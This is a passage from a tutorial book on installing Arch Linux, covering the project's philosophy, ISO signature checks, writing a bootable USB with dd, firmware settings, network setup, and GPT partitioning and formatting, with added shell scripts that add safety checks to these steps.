Chapter 1: Introduction, Philosophy and Preparation of the Environment
Welcome to "The Big Book of Arch Linux." This manual isn't simply a tutorial to help you install an operating system and forget about it; it's an architectural journey. Arch Linux isn't a finished product; it's a toolkit designed to help you build your own custom operating system. If you're here, you're probably tired of distributions that make decisions for you, install dozens of background services you don't use, and hide the inner workings under cumbersome graphical interfaces.
In this foundational chapter, we'll explore Arch's history, the unwavering philosophical pillars that dictate its development, the real-world implications of the Rolling Release model in production environments, and how to prepare your installation media using industry best practices.
1.1 History and Birth of an Idea
Arch Linux was conceived in March 2002 by Judd Vinet, a Canadian programmer and musician. Vinet was deeply inspired by a minimalist distribution called CRUX. While he appreciated the elegance and build-from-source nature of CRUX (and Gentoo), Vinet wanted something more pragmatic: a system that maintained that structural purity but used pre-compiled binary packages to save the user the massive hours of compilation required by Gentoo.
That is how pacman (the Package Manager) was born, originally written in C by Vinet himself. The goal was simple: to track dependencies precisely and install pre-packaged binaries quickly. Vinet led the project until 2007, when Aaron Griffin took over; Levente Polyak has led it since 2020. Today, Arch Linux is a large, community-supported project, but it still maintains its original vision.
1.2 Philosophy: The Arch Way
In the Arch Linux ecosystem, documentation isn't a suggestion, it's the law. The entire project is governed by a set of principles informally known as The Arch Way. Understanding them will save you a lot of frustration.
1.2.1 Simplicity (KISS - Keep It Simple, Stupid)
In the context of Arch, "simplicity" doesn't mean "easy for your grandma to use." It doesn't mean big buttons and wizards that do the work for you. In fact, for Arch, those wizards add complexity. Simplicity is defined from a technical, internal perspective. A simple system is one with the fewest possible modifications to the original (vanilla) code. Arch Linux delivers software as its upstream developers designed it: no large distribution patches, no hidden configuration, and no startup scripts that perform "magic". If you want a daemon to run, you type the command to enable it. Arch's simplicity lies in knowing exactly what your system is doing, because you built it.
1.2.2 Modernity (Bleeding Edge)
Arch Linux strives to ship the latest stable software versions. As soon as the developers of the Linux kernel or the KDE Plasma desktop release a new version and it has been packaged, it arrives in your repositories within days or even hours. This gives you immediate support for the newest hardware on the market and the latest technologies (like PipeWire or Wayland). The inherent downside is that you're on the "bleeding edge"; if there's a bug in the newly released code, you'll be among the first in the world to experience it.
1.2.3 Pragmatism
While the GNU project and distributions like Trisquel have a strict moral stance that prohibits any software that isn't open source, Arch is deeply pragmatic. While it prefers free software for technical and ethical reasons, it won't hesitate to provide proprietary drivers (such as those for NVIDIA graphics cards) or closed binary firmware if that's what the user's hardware needs to function properly. Decisions are made based on technical consensus and practical usability, not political dogma.
1.2.4 User-Centric (User-Centric vs User-Friendly)
Distributions like Ubuntu or Linux Mint are user-friendly : they try to anticipate user needs, automatically configuring printers, mounting USB drives, and installing office suites by default. Arch Linux is user-centric : it relies entirely on the intelligence and technical skills of its users. It assumes you're willing to read the manual, investigate problems, and take full control. Arch doesn't tell you which desktop environment to use; it simply provides the building blocks for you to construct. You are the architect.
1.3 The Rolling Release vs. Fixed Release Model
Understanding your operating system's lifecycle is crucial for its maintenance. The software industry primarily uses two update distribution models.
1.3.1 The Fixed Release Model
Used by Debian, Ubuntu, Fedora and Windows.
- How it works: Every few months or years, a new version is released (e.g., Ubuntu 22.04). During the lifecycle of that version, the core software (kernel, desktop environment, base libraries) is frozen. If GNOME or a core library releases a new major version upstream, the distribution doesn't give it to you; you receive security patches backported to the version that shipped with the release.
- Advantages: Extreme stability. Since nothing changes, things don't break unexpectedly. Ideal for critical servers in banking or aerospace applications.
- Disadvantages: The software becomes obsolete quickly. To get new features, you have to perform a massive "Version Upgrade" (e.g., upgrading to Ubuntu 24.04), which often involves gigabytes of dependencies changing all at once, running a high risk of breaking the system.
1.3.2 The Rolling Release Model
Used by Arch Linux, Gentoo and openSUSE Tumbleweed.
- How it works: There are no versions like "Arch Linux 2024." Arch Linux is a constant stream of seamless updates. You install the system only once . From then on, you run your package manager periodically, and each individual package is updated to its latest version.
- Advantages: You have a modern system for as long as you keep updating ("install once, update forever"). New kernel versions bring hardware support and performance work without a reinstall. Security fixes arrive as soon as upstream publishes a release and the maintainer packages it, rather than waiting for a backport. This is still not instantaneous, and it does not help at all on a machine that has stopped updating.
- Disadvantages: It requires active maintenance. You can't leave a machine running Arch powered off for eight months, turn it on, and run a single update: in the meantime the archlinux-keyring signing keys will have rotated, packages will have been renamed or split, and some updates will have required manual steps announced on the Arch news page. Such a system needs manual intervention (typically updating archlinux-keyring first, then reading the news before the full upgrade). Furthermore, the responsibility for ensuring that an update doesn't break a very specific workflow falls on the user.
1.4 Comparison: Where does Arch fit into the Ecosystem?
- Compared to Ubuntu/Pop!_OS: These distributions are excellent for newcomers or developers who want a ready-to-use environment in 10 minutes. However, their heavy use of Snap packages and PPAs (Personal Package Archives) often creates fragmented systems with packages from mutually untrusted sources. Arch has no PPAs; third-party software lives in the AUR (Arch User Repository). Keep in mind that the AUR distributes build recipes (PKGBUILDs) written by other users, not binaries vetted by Arch, so reading the PKGBUILD before you build it is part of the workflow, not an optional step.
- Compared to Debian: Debian is the unshakeable rock of stability. It's unbeatable for servers where uptime is measured in years. Arch is the complete opposite: it's dynamic, fast-moving, and ideal for developer workstations, gaming, and agile web servers.
- Compared to Fedora: Fedora is the middle ground. It has very new software, but follows a 6-month Fixed Release model sponsored by Red Hat. Arch beats Fedora in the vastness of its community repository (the AUR) and in the lightness of its base installation. Fedora enables security frameworks such as SELinux and firewalld out of the box; Arch installs neither by default, which keeps the base small but leaves mandatory access control and the firewall as things you must set up yourself.
- Compared to Gentoo: In Gentoo, you compile absolutely everything from source code for your specific processor. It takes days to install. Arch gives you pre-compiled binary packages, offering 99% of Gentoo's customization in a fraction of the installation time.
1.5 The Arch Wiki: The Penguin Oracle
The importance of the Arch Wiki (wiki.archlinux.org) cannot be overstated. It is widely regarded in the Linux community as the most comprehensive, best-maintained, and technically accurate documentation for GNU/Linux systems on the internet. Users of almost every other distribution end up on the Arch Wiki when they search for how to troubleshoot a network problem, compile a kernel, or configure Bluetooth.
Arch User Golden Rules:
- If you have a problem or want to install something new, search the Wiki first.
- If the Wiki refers you to a manual page (man page), read it (man commandname).
- Only if the Wiki and the manual don't answer your question should you turn to the forums or Reddit. The community expects you to have done your homework before asking; the phrase "Read The F*cking Manual (RTFM)" isn't an insult in Arch, it's a reminder of the philosophy.
1.6 Preparing the Installation Media (Live USB)
To begin our journey, we need to download and prepare the installation media. The Arch Linux ISO is a fully functional, compressed Linux system that boots from RAM.
1.6.1 Cryptographic Download and Verification
Go to the official downloads page: https://archlinux.org/download/. Using the BitTorrent or Magnet link is recommended. This reduces the load on the project's servers, and the BitTorrent client verifies each downloaded piece against the SHA-1 hashes in the torrent metadata, so you will not end up with a truncated or corrupted file. That is an integrity check, not an authenticity check: it proves the file matches what the torrent describes, not that the torrent describes the real Arch ISO. The signature verification below is still required.
If you download via direct download (HTTP), you must verify the integrity and authenticity of the ISO file. A corrupted file will cause unexplained failures during installation. Even worse, an attacker could have injected malware into the ISO (supply chain attack).
To verify, download the ISO and the PGP signature file (ending in .sig) into the same folder. On an existing Linux or macOS machine (on macOS, install GnuPG first, for example with Homebrew), run:
# Fetch the public key of the Arch developer (Pierre Schmitz) and verify the detached signature
gpg --keyserver-options auto-key-retrieve --verify archlinux-version-x86_64.iso.sig
The output should say "Good signature from ...". If it says "BAD signature", the file is corrupt or has been tampered with. Delete it immediately. Two caveats: gpg will also print "WARNING: This key is not certified with a trusted signature!" because you have not personally signed the developer's key; that warning is expected. What you must check is that the key fingerprint gpg prints matches the one published on the download page, because "Good signature" on its own only means that some key signed the file. On an existing Arch system you can instead run pacman-key -v archlinux-version-x86_64.iso.sig, which checks against the archlinux-keyring that pacman already trusts.
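As an added example (not code from this book or from the Arch project), the following shell functions do what the caveat above demands: they run gpg with its machine-readable status output and accept the ISO only if a VALIDSIG line names the fingerprint you expect, so an unknown key that merely claims to belong to an Arch developer is rejected. EXPECTED_FPR is a placeholder you must replace with the fingerprint from the download page, and the ISO filename in the usage comment is likewise a placeholder.

```shell
#!/bin/sh
# Added example, not part of the original book. `gpg --verify` exits 0 for any
# cryptographically valid signature, including one made by a key you have never
# seen before. The checks that matter are therefore (1) the signature is VALID
# and (2) the signing key's fingerprint is the one published on
# https://archlinux.org/download/. EXPECTED_FPR is a placeholder (assumption):
# copy the real fingerprint from that page before use.
EXPECTED_FPR="0000000000000000000000000000000000000000"

# check_status_output <expected_fpr>: reads `gpg --status-fd` lines on stdin.
# Returns 0 only if a VALIDSIG line names the expected key, either as the
# signing (sub)key fingerprint (field 3) or as the primary key fingerprint
# (field 12). Any BADSIG / ERRSIG / NO_PUBKEY line fails immediately.
check_status_output() {
  local expected="$1" line ok=1
  while IFS= read -r line; do
    case "$line" in
      "[GNUPG:] VALIDSIG "*)
        # word-splitting the status line into positional parameters is intended
        set -- $line
        if [ "$3" = "$expected" ] || [ "${12}" = "$expected" ]; then ok=0; fi ;;
      "[GNUPG:] BADSIG "*|"[GNUPG:] ERRSIG "*|"[GNUPG:] NO_PUBKEY "*)
        return 1 ;;
    esac
  done
  return "$ok"
}

# verify_iso <iso> [expected_fpr]: fetches the key if needed, verifies the
# detached signature <iso>.sig and insists on the fingerprint. The exit status
# is the verdict; a wrong fingerprint fails even though gpg itself said "Good".
verify_iso() {
  local iso="$1" expected="${2:-$EXPECTED_FPR}"
  if [ ! -f "$iso" ] || [ ! -f "$iso.sig" ]; then
    echo "missing $iso or $iso.sig" >&2; return 1
  fi
  gpg --keyserver-options auto-key-retrieve --status-fd 1 \
      --verify "$iso.sig" "$iso" 2>/dev/null |
    check_status_output "$expected"
}

# Usage (placeholder filename): verify_iso archlinux-2024.xx.xx-x86_64.iso "$EXPECTED_FPR" && echo OK
```

The status lines are parsed instead of the human-readable output because their format is documented (doc/DETAILS in the GnuPG source) and stable across locales, whereas "Good signature from" is translated on non-English systems.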
1.6.2 Creating the Bootable USB (Low-level Flashing)
Tools that simply extract the contents of the ISO onto a FAT32-formatted USB drive will not work reliably with Arch. The image is an ISOHYBRID: a single file that is simultaneously an ISO 9660 image and a raw disk image carrying its own partition table and boot records for both UEFI and BIOS, and the live system locates its root filesystem by the volume label written into that image. It is meant to be written to the device exactly as it is, so we need a bit-by-bit (block-level) copy.
Method 1: From Linux systems (the dd tool). The command dd (Data Duplicator, jokingly known as Disk Destroyer) is the most powerful and dangerous way to write images. One mistake in the device name will irreversibly erase your current system.
- Find the device path of your connected USB drive with lsblk. Let's assume it is /dev/sdb or /dev/sdc. NEVER use a partition number such as sdb1; use the whole device, sdb. A safer habit is to address the drive by its stable identifier, for example /dev/disk/by-id/usb-My_flash_drive (a placeholder; ls -l /dev/disk/by-id/ shows the real names and which sdX each points to), since a by-id path cannot silently change meaning when another disk is plugged in.
- Make sure it is not mounted:
sudo umount /dev/sdb*
- Write the image:
sudo dd if=archlinux-2024.xx.xx-x86_64.iso of=/dev/sdb bs=4M status=progress oflag=sync
if: input file (your ISO). of: output file (the raw USB device). bs=4M: writes in 4 megabyte blocks for speed. status=progress: displays progress. oflag=sync: opens the device for synchronous writes, so every block is physically committed before dd reports completion; the Arch wiki's equivalent is conv=fsync, which flushes once at the end. Either way, do not unplug the drive until the command returns.
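The following added example (not from the original book) wraps dd in the checks a careful administrator performs by hand: the target must be a whole disk rather than a partition, the kernel must flag it as removable, nothing on it may be mounted, and it must be below a size ceiling, so a mistyped device name cannot aim dd at the internal SSD. The SYSFS and MOUNTS variables exist only so the checks can be exercised against a constructed fake sysfs tree; on a real machine leave the defaults. The 256 GiB ceiling and the five-second grace period are assumptions you can change.

```shell
#!/bin/sh
# Added example, not part of the original book: guard rails around dd.
SYSFS="${SYSFS:-/sys}"                  # overridable so the checks can run against a fake tree
MOUNTS="${MOUNTS:-/proc/self/mounts}"   # same
MAX_SECTORS=$((256 * 1024 * 1024 * 2))  # 256 GiB in 512-byte sectors (assumption: no USB stick here is bigger)

# check_flash_target /dev/sdX
# Prints a reason and returns 1 on any problem; returns 0 if the device looks
# like a removable whole-disk target that is safe to overwrite.
check_flash_target() {
  local dev="$1" name sectors
  name="${dev##*/}"
  case "$name" in
    sd[a-z]*[0-9]|nvme*p[0-9]*|mmcblk*p[0-9]*)
      echo "refusing: $dev looks like a partition, use the whole disk"; return 1 ;;
  esac
  if [ ! -d "$SYSFS/block/$name" ]; then
    echo "refusing: $SYSFS/block/$name does not exist (is $dev a disk?)"; return 1
  fi
  if [ "$(cat "$SYSFS/block/$name/removable" 2>/dev/null)" != "1" ]; then
    echo "refusing: the kernel does not flag $dev as removable"; return 1
  fi
  # /proc/self/mounts lists the source device first on each line, so a prefix
  # match catches both the whole device and its partitions (sdb, sdb1, ...).
  if grep -q "^$dev" "$MOUNTS" 2>/dev/null; then
    echo "refusing: $dev or one of its partitions is mounted"; return 1
  fi
  sectors="$(cat "$SYSFS/block/$name/size" 2>/dev/null || echo 0)"
  if [ "$sectors" -gt "$MAX_SECTORS" ]; then
    echo "refusing: $dev has $sectors sectors, above the safety ceiling"; return 1
  fi
  return 0
}

# flash_iso <iso> /dev/sdX : runs the checks, then the same dd the text shows,
# with conv=fsync so dd only returns once the data is on the device.
flash_iso() {
  local iso="$1" dev="$2"
  [ -f "$iso" ] || { echo "no such file: $iso"; return 1; }
  check_flash_target "$dev" || return 1
  echo "about to overwrite $dev with $iso; press Ctrl+C within 5 seconds to abort"
  sleep 5
  sudo dd if="$iso" of="$dev" bs=4M status=progress conv=fsync
}

# Usage: flash_iso archlinux-2024.xx.xx-x86_64.iso /dev/sdb
```

The removable flag comes from the kernel, not from the device name, which is what makes the check worth having: an internal SATA disk that happens to be enumerated as /dev/sdb still reports 0 in /sys/block/sdb/removable.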
Method 2: From Windows systems. For users coming from Windows, Rufus or balenaEtcher is recommended.
- In Rufus , select your USB drive.
- Select the Arch Linux ISO file.
- When you click "Start," Rufus will issue a warning about the "ISOHybrid" format. You must select the "Write in DD Image mode" option. If you select ISO mode, the USB drive will not boot.
Method 3: Ventoy (multi-ISO drives). If you frequently work with multiple operating systems, Ventoy is worth knowing. You install Ventoy on your USB drive once, and it creates a data partition. From then on, you simply copy your .iso files (Arch, Windows, Ubuntu, rescue tools) to that partition. When you boot from the USB, Ventoy displays a menu allowing you to choose which ISO to boot. Arch Linux natively supports booting via Ventoy. Verify each ISO's signature before copying it over, as in 1.6.1; Ventoy will boot a tampered image just as readily as a genuine one.
1.6.3 Motherboard Configuration (UEFI)
Before inserting your USB drive, you must prepare the target machine:
- Turn on the device and repeatedly press the firmware key (usually F2, F12, Delete, or Esc).
- Disable Secure Boot. Unlike Fedora or Ubuntu, whose shim bootloaders are signed by Microsoft's third-party UEFI CA, the Arch ISO's boot files are not signed with any key that stock firmware trusts. If Secure Boot is enabled, the firmware will refuse to boot from the Arch USB drive. (In advanced chapters, you will learn to enroll your own keys, sign your own kernel and bootloader, and re-enable it.)
- If you're dual-booting, disable Windows Fast Startup (in the Windows power options) before rebooting. Fast Startup doesn't actually shut Windows down; it hibernates the kernel session, leaving the NTFS volumes marked dirty, so Linux will mount them read-only or refuse to mount them. The firmware's own "Fast Boot" option is a different setting that skips USB initialization and may hide the boot menu; disable it too while installing.
- Make sure the SATA storage controller mode is set to AHCI and not RAID/RST (Intel Rapid Storage Technology). The Linux installer needs to see the disks directly through AHCI; in RST mode the drives may be invisible to the live system. Note that if Windows is already installed in RST mode, switching to AHCI without preparing Windows first will leave it unable to boot.
- Place the USB drive at the top of the boot priority (Boot Order).
Save the changes, restart, and you'll be ready to delve into the black terminal prompt. If you've made it this far, you possess the necessary theoretical knowledge; Chapter 2 awaits you to get your hands dirty with partitioning.
Chapter 2: Basic Installation - Fundamentals and Systems Architecture
Installing Arch Linux is often seen by newcomers as an insurmountable obstacle, an archaic rite of passage. However, for the systems professional or developer, it's a masterclass in how to build a GNU/Linux operating system from the ground up. Unlike automated installers such as Calamares or Anaconda, which abstract away complexity and make architectural decisions for you, "The Arch Way" process requires you to understand every component of the technology stack: from the motherboard firmware to the package manager.
In this comprehensive chapter, you'll learn not only the commands needed to install the system, but also the theory and reasoning behind each one. By the end, you'll be equipped not only to install Arch, but also to recover crashed Linux servers, design secure storage architectures, and understand the boot process at an enterprise level.
2.1 The Live Environment and the Initial Boot Process
When you insert your USB installation media and power on your computer, you enter a critical phase controlled by your motherboard's firmware. There are two main firmware paradigms in modern computing, and understanding the difference is vital, as it will dictate how we partition our disks later on.
2.1.1 BIOS Legacy vs. UEFI
BIOS (Basic Input/Output System) and MBR
The BIOS is the firmware standard introduced in the 1980s. When a BIOS system boots, it performs a hardware check (POST) and then loads the MBR (Master Boot Record), the first 512-byte sector of the boot disk. Only 440 bytes of it are available for code, so a bootloader such as GRUB can only fit a tiny first stage there, whose job is to load the rest from elsewhere on the disk. The limitations of the BIOS and the MBR are severe by modern standards.
- It only supports disks up to 2 Terabytes.
- It only allows 4 primary partitions (requiring "extended" and "logical" partitions to overcome this).
- The startup is sequential and often slow.
UEFI (Unified Extensible Firmware Interface) and GPT
Widely adopted from around 2012, UEFI is a mini-operating system in its own right. Instead of executing code from a 512-byte sector, UEFI looks for a specific partition on the disk formatted as FAT32, known as the EFI System Partition (ESP). Within this partition, UEFI loads executable files with the .efi extension (PE/COFF binaries, the same format as Windows .exe files). The partitioning scheme that accompanies UEFI is GPT (GUID Partition Table), which:
- It supports disks up to 9.4 Zettabytes.
- It allows up to 128 partitions by default in Windows/Linux.
- Stores backup copies of the partition table at the end of the disk for redundancy in case of corruption.
Identifying the environment in Arch Linux: When you boot from the Arch USB, you will arrive at a terminal (tty1) logged in as root with a Zsh prompt. The first step as administrator is to confirm in which mode the firmware has booted. The kernel exposes the UEFI variables at /sys/firmware/efi/efivars. Run:
ls /sys/firmware/efi/efivars
- If the directory exists and lists many files, your system has booted in UEFI mode. You will use GPT partitioning. This guide focuses on UEFI, as it is the standard on current hardware. Recent kernels also expose the firmware's bitness: cat /sys/firmware/efi/fw_platform_size prints 64 on a normal x64 UEFI and 32 on the rare 32-bit UEFI implementations.
- If it throws an error (No such file or directory), you are in BIOS/Legacy mode. If your computer is modern but booted into BIOS, restart, enter the firmware settings and force "UEFI Only" mode or disable "CSM / Compatibility Support Module".
2.1.2 The Zsh Environment of Archiso
The system you are currently using is ephemeral. It runs entirely in your computer's RAM (tmpfs). Any changes you make here (except writing to physical disks) will be lost upon reboot. The official Arch Linux ISO (archiso) provides a rich environment with diagnostic tools: iproute2, vim, nano, parted, cryptsetup and data recovery utilities.
The keyboard is configured by default to the US layout. Working with symbols such as /, - and : is frustrating when the layout does not match your physical keyboard. To load a Spanish layout:
# Spanish (Spain) keyboard (includes Ñ and the correct symbols)
loadkeys es
# Latin American keyboard
loadkeys la-latin1
Technical note: loadkeys talks to the kernel's console keyboard (kbd) subsystem and loads a compressed keymap (.map.gz) stored under /usr/share/kbd/keymaps/. To see every available name, run localectl list-keymaps.
2.2 Network Subsystem: Connectivity and Synchronization
Arch Linux does not ship the operating system's packages on the installation ISO (unlike Ubuntu or Debian). The ISO only contains the live base environment. Therefore, a working internet connection is a non-negotiable requirement: all binaries and dependencies will be downloaded directly from the mirrors during the pacstrap phase.
2.2.1 Network Interfaces (Ethernet)
The Linux kernel, together with systemd-udevd, assigns Predictable Network Interface Names based on firmware and bus topology instead of the old eth0 and wlan0 names. You'll see names like enp3s0 (Ethernet, PCI bus 3, slot 0) or wlp2s0 (Wireless, PCI bus 2, slot 0).
To list your network interfaces and check their status:
ip link
If you connect an Ethernet cable, systemd-networkd on the live system will detect the link and automatically request an IP address from your router using DHCP (DNS is handled by systemd-resolved). You can verify that you have an address with:
ip -brief address show
And test DNS resolution and connectivity:
ping -c 4 archlinux.org
2.2.2 Wireless Networks (Wi-Fi) with iwd
If you rely on Wi-Fi, the Arch ISO includes iNet Wireless Daemon (iwd), developed by Intel. It's a modern and lightweight daemon that replaces the older wpa_supplicant.
To configure the connection interactively, invoke the client:
iwctl
The prompt will change to [iwd]#. The logical sequence of commands is:
- Identify the radio adapter:
[iwd]# device list
Let's assume the device name (Name) is wlan0. If it is listed but powered off, or if rfkill list shows it as soft-blocked, run rfkill unblock wifi from the normal shell first.
- Scan for networks:
[iwd]# station wlan0 scan
- List the available networks:
[iwd]# station wlan0 get-networks
- Connect to the network (SSID):
[iwd]# station wlan0 connect "Your WiFi Network Name"
If the network name has spaces, use quotation marks. It will ask for the passphrase. After entering it and pressing Enter, exit the iwd prompt with exit or Ctrl+D.
Troubleshooting Wi-Fi: If your adapter does not appear in device list, it most likely requires firmware that is not included in the default ISO (common with certain Broadcom chips or very specific Realtek USB adapters). In that case, the practical solution is to use an Ethernet cable or tether your mobile phone's internet connection via a USB cable (Linux will detect the phone as a wired network interface).
2.2.3 Cryptography and Time Synchronization (NTP)
Before downloading packages from the internet, your system clock must be accurate. Why? The Arch package manager (pacman) verifies the PGP signature of every downloaded package to prevent man-in-the-middle attacks and to ensure that each package legitimately comes from an Arch packager. Signing keys have creation and expiry dates; if your motherboard clock is months or years off, keys will appear expired or not yet created, and pacman will refuse to install anything, returning "invalid or corrupted package (PGP signature)" errors. A wrong clock also breaks TLS certificate validation against the HTTPS mirrors.
To synchronize the time using Network Time Protocol (NTP):
On the live ISO, systemd-timesyncd is already enabled and will synchronize the clock over NTP as soon as the network is up. To enable it explicitly:
timedatectl set-ntp true
To verify that the system has synchronized correctly:
timedatectl status
Look for the lines NTP service: active and System clock synchronized: yes. Also make sure that the "Universal time" shown is correct. Linux prefers the motherboard's hardware clock (RTC) to be set to UTC and derives your local time from your time zone.
2.3 Advanced Storage and Partitioning Architecture
Partitioning is the foundation of your system. A poor design here will limit the future flexibility of your server or workstation. Linux treats everything as a file, and disks are no exception: they appear as device nodes under /dev/.
2.3.1 Block Device Nomenclature
Before modifying the disks, we must identify them with absolute certainty. Selecting the wrong device means irretrievable data loss. Run the command to list block devices:
lsblk -f
(The -f flag displays existing file systems, labels and their UUIDs.)
- SATA (traditional mechanical hard drives and SATA SSDs): named sd (SCSI disk). The first disk is /dev/sda, the second /dev/sdb. Partitions are numbered: /dev/sda1, /dev/sda2.
- NVMe (modern PCIe SSDs): they have their own nomenclature because they bypass the SCSI layer. They are named nvmeXnY (where X is the controller and Y is the namespace). Example: /dev/nvme0n1. Partitions add a 'p': /dev/nvme0n1p1.
- eMMC (common in cheap laptops or single-board computers): named /dev/mmcblk0, with partitions /dev/mmcblk0p1 and so on.
- Loop devices: you'll see several /dev/loopX entries. These back the live ISO's own image files and you can ignore them completely.
From this point on, we will assume that we are installing Arch Linux on the main NVMe SSD: /dev/nvme0n1. If you have a SATA drive, replace the device with /dev/sda and the partitions with /dev/sda1, /dev/sda2, /dev/sda3 (no 'p') in the relevant commands.
2.3.2 LVM, LUKS and Partitioning Schemes
There are multiple ways to partition your disk, ranging from simple to enterprise architecture:
- Basic scheme (recommended for beginners):
  - EFI partition (boot) - FAT32.
  - Swap partition - Linux swap.
  - Root partition (/) - Ext4 or Btrfs.
- LVM (Logical Volume Manager):
LVM introduces an abstraction layer over physical disks. Instead of static partitions, you group one or more Physical Volumes into a pool (a Volume Group) and carve elastic Logical Volumes out of it. If in the future you run out of space in /home, you can add another disk to the Volume Group and grow the /home volume online, without rebooting.
- LUKS (Linux Unified Key Setup) - Full Disk Encryption (FDE):
On a laptop, encryption is mandatory in professional environments. LUKS creates a block-level encrypted container. Without the passphrase entered at boot (the initramfs prompts for it before the root filesystem is mounted), the data on the SSD is indistinguishable from random noise, protecting your SSH keys, source code, and client data if the hardware is stolen. Two caveats a threat model should include: LUKS protects data at rest only, not a machine that is powered on and unlocked; and the EFI partition holding the kernel and initramfs is not encrypted, which is why the Secure Boot and signing topics of later chapters matter.
In this manual, we will address the basic scheme with static partitions, adapted to current best practices.
2.3.3 Destruction of the previous table and creation of GPT
We will use fdisk. cgdisk (an ncurses interface for GPT disks) also works, but fdisk is the classic and most universal tool.
Start fdisk pointing at your target disk:
fdisk /dev/nvme0n1
In the fdisk interactive prompt:
- Create a new empty partition table: press g (creates a new GPT table in memory). Attention! Once you later press w, every previous partition entry on the disk is gone. Note that this only discards the partition table, not the data blocks themselves; anything stored on the disk remains recoverable with forensic tools until it is overwritten or discarded, so a disk that is being retired or repurposed still needs a proper wipe.
- Create the EFI (boot) partition:
  - Press n (new partition).
  - Partition number: 1 (press Enter).
  - First sector: press Enter (uses the default start).
  - Last sector: type +1G and press Enter. (Firmware and Windows are happy with a few hundred megabytes, but 1 GiB is the current recommendation when the ESP is mounted at /boot, since kernels and initramfs images live there and you may install several kernels.)
  - Change the type: press t, then choose "EFI System". Type L to see the list; the numbers in that list change between util-linux versions, so read the names rather than memorizing a number.
- Create the swap partition:
Swap acts as an overflow area when physical RAM is full, delaying the point at which the kernel's OOM killer terminates processes. It is also required if you want hibernation (suspend to disk).
  - Press n.
  - Partition number: 2 (Enter).
  - First sector: Enter.
  - Last sector: type +8G (or at least the size of your RAM if you plan to hibernate; with 16 GB of RAM, +16G).
  - Change the type: press t, select partition 2, and choose "Linux swap" from the list.
- Create the root partition (/):
This is where the whole operating system, binaries, configuration and your personal files will live. A single root partition without a separate /home is the simplest layout for a modern desktop installation.
  - Press n.
  - Partition number: 3 (Enter).
  - First sector: Enter.
  - Last sector: Enter (with no limit it takes all remaining free space on the disk, which is what we want).
  - The default type is "Linux filesystem", so there is no need to change it.
- Verification and writing:
Press p to print the table you have just designed. You should see:
/dev/nvme0n1p1 - 1G - EFI System
/dev/nvme0n1p2 - 8G - Linux swap
/dev/nvme0n1p3 - (remaining size) - Linux filesystem
If everything is correct, press w (write) to commit the changes to disk and exit. If you made a mistake, press q to quit without saving and start over.
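As an added example (not from the original book), here is the same three-partition GPT layout expressed as an sfdisk script. sfdisk reads the layout from standard input, so the design can be reviewed in a file and replayed identically on several machines, and the partition types are given as GPT type GUIDs rather than fdisk's menu numbers, which change between util-linux versions. The device and swap size are parameters; the defaults match the chapter (/dev/nvme0n1, 8 GiB of swap). apply_layout is destructive and is not exercised by the test.

```shell
#!/bin/sh
# Added example, not part of the original book: the chapter's partition layout as
# a reproducible sfdisk script. GPT partition type GUIDs (fixed by the UEFI spec
# and the Linux conventions, independent of the util-linux version):
EFI_GUID=C12A7328-F81F-11D2-BA4B-00A0C93EC93B    # EFI System Partition
SWAP_GUID=0657FD6D-A4AB-43C4-84E5-0933C84B4F4F   # Linux swap
LINUX_GUID=0FC63DAF-8483-4772-8E79-3D69D8477DE4  # generic Linux filesystem

# gpt_layout [swap_size]: prints the sfdisk script. Sizes use sfdisk's
# multiplicative suffixes; the last partition has no size, so it takes whatever
# remains on the disk, exactly like pressing Enter at fdisk's "Last sector".
gpt_layout() {
  local swap="${1:-8G}"
  cat <<EOF
label: gpt
size=1G, type=$EFI_GUID, name="EFI system partition"
size=$swap, type=$SWAP_GUID, name="swap"
type=$LINUX_GUID, name="root"
EOF
}

# apply_layout <disk> [swap_size]: DESTRUCTIVE. Clears old filesystem and
# partition-table signatures first (wipefs), writes the layout, then asks sfdisk
# to sanity-check the result. Neither wipefs nor sfdisk erases the data blocks
# themselves; old contents stay recoverable until overwritten or discarded.
apply_layout() {
  local disk="$1" swap="${2:-8G}"
  if [ ! -b "$disk" ]; then
    echo "$disk is not a block device" >&2; return 1
  fi
  wipefs --all "$disk" &&
  gpt_layout "$swap" | sfdisk "$disk" &&
  sfdisk --verify "$disk"
}

# Usage: gpt_layout 16G          # review the script
#        apply_layout /dev/nvme0n1 16G   # write it (destroys the disk's table)
```

If you prefer the root partition to carry the architecture-specific "Linux root (x86-64)" type from the Discoverable Partitions Specification, which lets systemd find the root filesystem without a root= parameter, replace LINUX_GUID with 4F68BCE3-E8CD-4DB1-96E7-FBCAF984B709; the generic type used above is what fdisk assigns by default and works with any bootloader configuration.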
2.4 File Systems and Formatting
Raw partitions are useless until they are given a file system, which dictates the algorithmic logic of how data is saved, indexed, and read. Linux excels in the variety and specialization of its filesystems.
2.4.1 File System Theory: Ext4 vs Btrfs vs XFS
- Ext4 (Fourth Extended Filesystem): The reliable granddaddy. Present since 2008, it is robust, rock-solid stable, and resilient to power outages thanks to its journal. If you want a system you can install and forget, Ext4 is the default choice.
- Btrfs (B-Tree Filesystem): Developed by Oracle and SUSE, it is a "next-generation" (copy-on-write) filesystem. It supports snapshots (system snapshots taken in milliseconds), on-the-fly compression (transparent zstd), and subvolumes. It is the default filesystem in Fedora and Garuda Linux. It allows for an incredible level of disaster recovery (you can restore the operating system to how it was 5 minutes ago), but requires more in-depth learning to manage its disk space, as snapshots silently consume disk space.
- XFS: Created by Silicon Graphics. It is the undisputed king for handling massively large files (such as enterprise databases or 8K video editing) due to its bandwidth allocation and parallel I/O capacity. It is the standard in Red Hat Enterprise Linux.
For this professional deployment manual, we will use Ext4 because of its resilience and universality, which reduces complexity in standard production and desktop environments.
2.4.2 Partition Formatting
The utility for formatting is mkfs (Make File System).
1. The EFI (boot) partition: The UEFI specification requires the ESP to be formatted as FAT (in practice FAT32), an old Microsoft file system, because it is the only filesystem every UEFI firmware is required to read.
mkfs.fat -F 32 /dev/nvme0n1p1
(The -F 32 option forces FAT32 rather than FAT16; forgetting it on a small partition is a common mistake.)
2. The swap partition: Swap has its own specialized on-disk header. It is initialized and then activated immediately so that the live environment can use it if needed.
mkswap /dev/nvme0n1p2
swapon /dev/nvme0n1p2
3. The root partition (Ext4): We format the bulk of the disk with Ext4. This builds the inode tables and the journal.
mkfs.ext4 /dev/nvme0n1p3
If you have chosen Btrfs (for advanced users), the command would be mkfs.btrfs /dev/nvme0n1p3.
2.4.3 Directory Tree Assembly
To install the system, we need to mount our new partitions within the virtual file tree of our Live USB. By convention, we will use the directory /mnt.
Order is critical. Always mount the root partition (/) first, then create directories inside it to mount the subordinate partitions (such as boot or home).
Mount root:
mount /dev/nvme0n1p3 /mnt
